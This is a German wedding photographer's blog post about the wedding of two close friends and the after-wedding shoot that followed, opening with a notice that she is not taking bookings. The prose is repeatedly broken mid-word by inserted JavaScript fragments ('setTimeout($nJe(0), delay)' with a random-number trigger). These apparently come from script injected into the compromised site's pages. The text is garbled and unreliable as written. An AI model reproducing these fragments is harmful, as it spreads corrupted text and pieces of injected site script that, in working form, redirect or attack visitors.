Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Wenn Freunde heiraten | After-Wedding-Shooting

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografin_Heidelberg.jpg“ alt=““ width=“1380″ height=“920″ />

 

– Selbstgemachter Blumenkranz & schöne Abendstimmung –

Timo und Svenja gaben sich nicht nur dieses Jahr  das Ja-Wort, sondern sind auch schon sehr lange gute Freunde von mir. Bei all der Liebe und den Planungen durfte ich auch zum ersten Mal in meinem Leben Trauzeugin sein. Wir hatten gemeinsame lustige Stunden vor der Hochzeit. Ob beim Basteln (was ich nicht zu meinen Talenten zähle), beim Junggesellinnenabschied (vielen Dank an die JGA-Mädels) oder wenn ich an die wunderschöne Hochzeit der Beiden denke.

Es ist ein ganz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderes Gefühl auf Hochzeiten zu gehen, wenn man als Gast dabei ist. Ich konnte so richtig mitfiebern. Besonders in Erinnerung blieb mir dabei die Rede von Svenja & Timo, die ihren Familien für die Unterstützung mit Blumen gedankt haben. Freudentränen, Dankbarkeit und Aufregung prallten direkt aufeindom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander. Emotionen pur. Gänsehaut, wenn man so gute Freunde aufgeregt in den Tag starten sieht. Aber auch ich wurde mit einem Präsent überrascht. (Danke noch einmal für das wunderschöne Armbdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and mit dem Infinty Zeichen). Ich liebe es, wenn ich an den Hochzeitstanz der Beiden denke, wie sie dabei gestrahlt haben. Eine Prinzessinnen würdige Location, leckeres Essen und die lebensgroße Leinwdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, welches am Hochzeitstag mit einem individuellen Graffiti besprüht wurde (was für eine originelle Idee!) werde ich immer gerne in Erinnerung behalten.

Ich bin glücklich als Gast dabei gewesen zu sein, aber ich muss auch zugeben, dass es in meinen Fingern kribbelte und ich gerne, ab und zu, zu meiner Kamera gegriffen hätte. Das ist dann wohl die leidenschaftliche Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografin in mir ;).

Für den großen Tag war meine Kollegin Sarina als Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografin für die zwei Lieben da, für das After-Wedding-Shooting durfte ich wieder die Zwei ablichten. Einen kleinen Auszug aus dem After-Wedding Shooting möchte ich heute mit euch teilen. Dazu werde ich jetzt gar nicht mehr so viele Worte verwenden (sonst wird der Text einfach zu lang!): Ein dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolles Paar, ein selbstgemachter Blumenkranz und ein schöner Abend. Danke für euer Vertrauen in mich! Liebe Svenja, lieber Timo ich wünsche euch nur das Beste für eure gemeinsame Zukunft! Auf noch ganz viele spannende Jahre!

Auch heute noch sind die schönsten Stunden die, bei denen ich solche besonderen Momente fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografieren darf. Danke dafür!

Eure,

After-Wedding

Keine Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

Menu